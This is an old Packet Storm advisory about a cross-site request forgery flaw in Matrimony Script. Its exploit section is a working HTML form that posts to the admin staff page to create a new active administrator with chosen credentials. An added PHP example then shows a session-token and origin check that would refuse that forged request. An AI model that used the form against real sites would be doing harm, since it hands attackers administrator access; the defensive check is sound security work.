Matrimony Script XSRF

2009-12-17T00:00:00
ID PACKETSTORM:83971
Type packetstorm
Reporter bi0
Modified 2009-12-17T00:00:00

Description

                                        
                                            ` ______ __ ______  
/\ == \ /\ \ /\ __ \  
\ \ __< \ \ \ \ \ \/\ \  
\ \_____\ \ \_\ \ \_____\  
\/_____/ \/_/ \/_____/  
  
01000010 01101001 01001111  
  
[#]----------------------------------------------------------------[#]  
#  
# [+] Matrimony Script CSRF Vulnerability  
#  
# // Author Info  
# [x] Author: bi0  
# [x] Contact: bukibv@hotmail.com  
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and all my friends  
# [x] Irc : irc.freenode.net / #security-shell  
# [*] Note : R.I.P Rock4eveR, We'll never forget you !  
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :  
#  
# // CSRF to Create new Admin Staff  
#  
#================================================================#  
<html>  
<body>  
<!-- Create new Admin Staff -->  
<form action="http://[server]/admin/admin_staffs.php" method="post">  
<input name="name" type="text" id="name" value="name">  
<input name="username" type="text" class="forminput" id="username" value="user">  
<input name="pass" type="text" id="pass" value="pass">  
<input name="email" type="text" id="email" value="email@somtging.com">  
<input type="hidden" id="status" value="Active" name="status" >  
<input name="Submit" type="submit" class="button" value="Create Staff">  
</form>  
</body>  
</html>  
#================================================================#  
#  
#  
[#]------------------------------------------------------------------------------------------[#]  
  
  
#EOF  
  
`
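
A server-side check that would refuse the form above, as an added example that is not part of the original advisory or of the Matrimony Script code base. It assumes a per-session synchronizer token carried in a hidden field; the function names, the `csrf_token` field name and both origins are hypothetical.

```php
<?php
// Added example, not Matrimony Script code. Function names, the csrf_token
// field and both origins are hypothetical.

// Issue (or reuse) the per-session token that the admin form embeds as a hidden field.
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Return null when the request may proceed, otherwise the reason it is refused.
function csrf_reject_reason(array $session, array $server, array $post, string $ownOrigin): ?string
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 'state change must use POST';
    }
    // When the browser supplies an Origin header, it must be the admin site itself.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return 'cross-origin request';
    }
    // Constant-time comparison against the token stored in the admin's session.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return 'missing or invalid CSRF token';
    }
    return null;
}

// Constructed sample data: one admin session and two staff-creation requests.
$session = [];
$token   = csrf_issue($session);
$own     = 'https://admin.example.test';

// Fields exactly as the form above submits them: no token, foreign Origin.
$forged       = ['name' => 'name', 'username' => 'user', 'pass' => 'pass',
                 'email' => 'email@somtging.com', 'status' => 'Active'];
$forgedServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example.test'];

// The same fields sent from the application's own form, which includes the token.
$legit       = $forged + ['csrf_token' => $token];
$legitServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $own];

var_dump(csrf_reject_reason($session, $forgedServer, $forged, $own));
var_dump(csrf_reject_reason($session, $legitServer, $legit, $own));
```

In a real handler the three arrays would be `$_SESSION`, `$_SERVER` and `$_POST`, and the check would run before any staff record is written.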